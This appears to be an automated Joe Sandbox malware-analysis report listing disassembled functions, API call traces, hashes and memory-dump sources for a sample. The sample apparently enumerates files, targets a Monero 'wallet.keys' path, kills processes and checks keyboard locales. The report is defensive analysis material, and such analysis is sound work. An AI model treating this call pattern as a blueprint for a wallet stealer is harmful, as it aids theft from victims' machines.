                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                      • String ID: \*.*
                                      • API String ID: 1415058207-1173974218
                                      • Opcode ID: 3edea43479dc0a48e3ab2d88da75abc5d7d2d19abc337e91e0792733a2c3fff5
                                      • Instruction ID: ea07831e8e1a328fb485f26c4fe0be1c61a9ea3abd40340b60e4da5d7b17d40e
                                      • Opcode Fuzzy Hash: 3edea43479dc0a48e3ab2d88da75abc5d7d2d19abc337e91e0792733a2c3fff5
                                      • Instruction Fuzzy Hash: 44125575950518ABDB15FBA0CEA6EEE7339BFA4300F4045D9B50A62091EF306F89CF61
                                      Function 00A3DF10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00A4AA50: lstrcpy.KERNEL32(00A50E1A,00000000), ref: 00A4AA98
                                        • Part of subcall function 00A4ACC0: lstrlen.KERNEL32(?,013189C8,?,\Monero\wallet.keys,00A50E1A), ref: 00A4ACD5
                                        • Part of subcall function 00A4ACC0: lstrcpy.KERNEL32(00000000), ref: 00A4AD14
                                        • Part of subcall function 00A4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00A4AD22
                                        • Part of subcall function 00A4ABB0: lstrcpy.KERNEL32(?,00A50E1A), ref: 00A4AC15
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00A50C32), ref: 00A3DF5E
                                      • StrCmpCA.SHLWAPI(?,00A515C0), ref: 00A3DFAE
                                      • StrCmpCA.SHLWAPI(?,00A515C4), ref: 00A3DFC4
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00A3E4E0
                                      • FindClose.KERNEL32(000000FF), ref: 00A3E4F2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                      • String ID: \*.*
                                      • API String ID: 2325840235-1173974218
                                      • Opcode ID: bfa19b370d0b70b41bc2e535e78d96c779bba11f1224bab5a08c209881bddb87
                                      • Instruction ID: 350fbbba489c6ac1f7e839ba04663d7c60613e1d794248325ac3c6721220ffc3
                                      • Opcode Fuzzy Hash: bfa19b370d0b70b41bc2e535e78d96c779bba11f1224bab5a08c209881bddb87
                                      • Instruction Fuzzy Hash: 3FF1EE769505289BDB15FB60CEA6EEE7339BFA4340F4045D9B40A62091EF306F89CF61
                                      Function 00A3DB80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00A4AA50: lstrcpy.KERNEL32(00A50E1A,00000000), ref: 00A4AA98
                                        • Part of subcall function 00A4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00A4AC82
                                        • Part of subcall function 00A4AC30: lstrcat.KERNEL32(00000000), ref: 00A4AC92
                                        • Part of subcall function 00A4ACC0: lstrlen.KERNEL32(?,013189C8,?,\Monero\wallet.keys,00A50E1A), ref: 00A4ACD5
                                        • Part of subcall function 00A4ACC0: lstrcpy.KERNEL32(00000000), ref: 00A4AD14
                                        • Part of subcall function 00A4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00A4AD22
                                        • Part of subcall function 00A4ABB0: lstrcpy.KERNEL32(?,00A50E1A), ref: 00A4AC15
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00A515A8,00A50BAF), ref: 00A3DBEB
                                      • StrCmpCA.SHLWAPI(?,00A515AC), ref: 00A3DC33
                                      • StrCmpCA.SHLWAPI(?,00A515B0), ref: 00A3DC49
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00A3DECC
                                      • FindClose.KERNEL32(000000FF), ref: 00A3DEDE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                      • String ID:
                                      • API String ID: 3334442632-0
                                      • Opcode ID: 57d6cf2e8a71373ddb6534655302bbdef2824c1452b0742f17b0463bacb1678b
                                      • Instruction ID: 711b35a4e9043fcb8f5475b9d9ecab5aea8a3fb032e4913e276abbc22c3e6ae0
                                      • Opcode Fuzzy Hash: 57d6cf2e8a71373ddb6534655302bbdef2824c1452b0742f17b0463bacb1678b
                                      • Instruction Fuzzy Hash: 6D915577A402149BDB14FB70EE96AED737DAFD4341F404568F90B96181EE34AB08CB92
                                      Function 00A498E0 Relevance: 12.1, APIs: 8, Instructions: 55processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00A49905
                                      • Process32First.KERNEL32(00A39FDE,00000128), ref: 00A49919
                                      • Process32Next.KERNEL32(00A39FDE,00000128), ref: 00A4992E
                                      • StrCmpCA.SHLWAPI(?,00A39FDE), ref: 00A49943
                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00A4995C
                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00A4997A
                                      • CloseHandle.KERNEL32(00000000), ref: 00A49987
                                      • CloseHandle.KERNEL32(00A39FDE), ref: 00A49993
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                      • String ID:
                                      • API String ID: 2696918072-0
                                      • Opcode ID: 19a37fe4e5d3159280f404af35cc09d5eef45f6c64cb85b80fecae04205a727a
                                      • Instruction ID: 5db48841dcb72bdfca84a1a9a58d2cadaa8c6b3a0b58961b6feecfadbd9a5d2d
                                      • Opcode Fuzzy Hash: 19a37fe4e5d3159280f404af35cc09d5eef45f6c64cb85b80fecae04205a727a
                                      • Instruction Fuzzy Hash: 1211EF75E14318ABDB24DFA4DC48BDEB779AB88701F00458CF509EA290D774AA84CFA1
                                      Function 00E96831 Relevance: 11.6, Strings: 8, Instructions: 1627COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: )l$"h;$%Q?}$20gn$;%[~$Am~$G/M$zo;w
                                      • API String ID: 0-3527859427
                                      • Opcode ID: 6c739c941896d5509280b1467e41f86fd957a33e92bc83b0dbf2404df59e6fbd
                                      • Instruction ID: 29e8e651155a24d7ffd6e98f24f57b2a724fa38d4728fb62d12128b3c1e7e3a5
                                      • Opcode Fuzzy Hash: 6c739c941896d5509280b1467e41f86fd957a33e92bc83b0dbf2404df59e6fbd
                                      • Instruction Fuzzy Hash: 57B239F360C204AFE7046E2DEC8567AFBE5EF94320F1A463DEAC587744EA3558018697
                                      Function 00E94D6F Relevance: 11.6, Strings: 8, Instructions: 1591COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: %dS$&Vo$2y^_$6>o$CD__$J_$}z$|#
                                      • API String ID: 0-2677354581
                                      • Opcode ID: a4174f0e3d6f137587c2d4072c5bb24a6d4094d7be866ad0f312375f2278a824
                                      • Instruction ID: dccc0b5b32eba99b0f3df4fd3da58b9765d48d928ae4e8c7921b43565edc21ca
                                      • Opcode Fuzzy Hash: a4174f0e3d6f137587c2d4072c5bb24a6d4094d7be866ad0f312375f2278a824
                                      • Instruction Fuzzy Hash: BFB2D4F350C6009FE304AF29EC8567AFBE5EF94720F1A8A2DE6C4C7744E63558418697
                                      Function 00A47D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00A4AA50: lstrcpy.KERNEL32(00A50E1A,00000000), ref: 00A4AA98
                                      • GetKeyboardLayoutList.USER32(00000000,00000000,00A505B7), ref: 00A47D71
                                      • LocalAlloc.KERNEL32(00000040,?), ref: 00A47D89
                                      • GetKeyboardLayoutList.USER32(?,00000000), ref: 00A47D9D
                                      • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00A47DF2
                                      • LocalFree.KERNEL32(00000000), ref: 00A47EB2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                      • String ID: /
                                      • API String ID: 3090951853-4001269591
                                      • Opcode ID: 336a29d1acb4be14d014293dc3dc3b1f01fca7b07d4a1a8662035d6a59d538d4
                                      • Instruction ID: 4e61e685c7e481428063ecd2eee2fcdf203bdd070ba3a0187a997bd676ecd32b
                                      • Opcode Fuzzy Hash: 336a29d1acb4be14d014293dc3dc3b1f01fca7b07d4a1a8662035d6a59d538d4
                                      • Instruction Fuzzy Hash: A0415E75940218ABDB24DBA4DD99FEEB374FF94700F2041D9E00AA6290DB742F85CFA1
                                      Function 00E8FDE8 Relevance: 10.4, Strings: 7, Instructions: 1621COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: $&^Z$0{$3j$7<?$:jk$2Sv$O~
                                      • API String ID: 0-4089210368
                                      • Opcode ID: 99331545b75ca27c43bb05cc0461b9600713c739cff6a997b62169fc4ca253e5
                                      • Instruction ID: e84ff1d23e232747c7c6b683ceb741eec4ada3b093fba2c5fc43791f728c93c8
                                      • Opcode Fuzzy Hash: 99331545b75ca27c43bb05cc0461b9600713c739cff6a997b62169fc4ca253e5
                                      • Instruction Fuzzy Hash: 24B2E5F3A082049FE314AE2DEC8566AFBE9EF94720F1A493DE6C4C3744E63558058797
                                      Function 00A3E530 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00A4AA50: lstrcpy.KERNEL32(00A50E1A,00000000), ref: 00A4AA98
                                        • Part of subcall function 00A4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00A4AC82
                                        • Part of subcall function 00A4AC30: lstrcat.KERNEL32(00000000), ref: 00A4AC92
                                        • Part of subcall function 00A4ACC0: lstrlen.KERNEL32(?,013189C8,?,\Monero\wallet.keys,00A50E1A), ref: 00A4ACD5
                                        • Part of subcall function 00A4ACC0: lstrcpy.KERNEL32(00000000), ref: 00A4AD14
                                        • Part of subcall function 00A4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00A4AD22
                                        • Part of subcall function 00A4ABB0: lstrcpy.KERNEL32(?,00A50E1A), ref: 00A4AC15
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00A50D79), ref: 00A3E5A2
                                      • StrCmpCA.SHLWAPI(?,00A515F0), ref: 00A3E5F2
                                      • StrCmpCA.SHLWAPI(?,00A515F4), ref: 00A3E608
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00A3ECDF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                      • String ID: \*.*
                                      • API String ID: 433455689-1173974218
                                      • Opcode ID: 24b0b30485bddd1f34776cb6b37f6196dc70e9a10d73b52c93192def9c48687e
                                      • Instruction ID: 0a535b564dd45e225ad250d05631daefe4ee9ccd64b92a92ba14f84b5881386b
                                      • Opcode Fuzzy Hash: 24b0b30485bddd1f34776cb6b37f6196dc70e9a10d73b52c93192def9c48687e
                                      • Instruction Fuzzy Hash: 6E124576A501189BDB14FB60DEA6EED7339AFA4340F4045E8B50A52191EF306F49CF62
                                      Function 00E9D301 Relevance: 9.0, Strings: 6, Instructions: 1542COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: @do$DK$F{?]$rZW$w(Q$V_{
                                      • API String ID: 0-3072587368
                                      • Opcode ID: f827f7df2554d2df309c523f766cc192e33ef33fe3d6d6d55ab2221dcbd1fb87
                                      • Instruction ID: 7e1d9093f8613a4d9dcccce182600a94a3dc8cbd84241bd8a3879436d3bbafe4
                                      • Opcode Fuzzy Hash: f827f7df2554d2df309c523f766cc192e33ef33fe3d6d6d55ab2221dcbd1fb87
                                      • Instruction Fuzzy Hash: D4A2D3F3A0C6009FE304AE2DDC8567AB7E9EF94720F16493DEAC4C3744EA3558158697
                                      Function 00E8E2AE Relevance: 7.9, Strings: 5, Instructions: 1642COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
